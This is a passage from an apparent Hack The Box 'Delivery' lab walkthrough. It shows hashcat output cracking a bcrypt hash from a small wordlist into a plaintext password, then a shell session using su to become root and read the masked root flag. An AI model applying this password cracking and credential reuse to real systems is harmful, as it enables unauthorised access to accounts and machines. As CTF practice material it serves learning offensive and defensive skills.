Watchdog: Hardware monitoring interface not found on your system. Watchdog: Temperature abort trigger disabled.

Host memory required for this attack: 65 MB

Dictionary cache built:

  • Filename..: passwords-hashcat.txt
  • Passwords.: 77
  • Bytes…..: 1177
  • Keyspace..: 77
  • Runtime…: 0 secs

The wordlist or mask that you are using is too small. This means that hashcat cannot use the full parallel power of your device(s). Unless you supply more work, your cracking speed will drop. For tips on supplying more work, see: https://hashcat.net/faq/morework

Approaching final keyspace - workload adjusted.

$2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO:PleaseSubscribe!21

Session……….: hashcat Status………..: Cracked Hash.Name……..: bcrypt $2*$, Blowfish (Unix) Hash.Target……: $2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v…JwgjjO Time.Started…..: Sun Jan 31 11:17:48 2021 (1 sec) Time.Estimated…: Sun Jan 31 11:17:49 2021 (0 secs) Guess.Base…….: File (passwords-hashcat.txt) Guess.Queue……: 1/1 (100.00%) Speed.#1………: 89 H/s (6.70ms) @ Accel:32 Loops:8 Thr:1 Vec:8 Recovered……..: 1/1 (100.00%) Digests Progress………: 77/77 (100.00%) Rejected………: 0/77 (0.00%) Restore.Point….: 0/77 (0.00%) Restore.Sub.#1…: Salt:0 Amplifier:0-1 Iteration:1016-1024 Candidates.#1….: PleaseSubscribe! -> PeSubs

Started: Sun Jan 31 11:17:47 2021 Stopped: Sun Jan 31 11:17:50 2021 eneloop@kinetic:…/lab/hackthebox/delivery$

maildeliverer@Delivery:/opt/mattermost/config$ su - root Password: root@Delivery:~# cat root.txt aa1XXXXXXXXXXXXXXXXXXXXXXXXd36c25 root@Delivery:~#

Notes: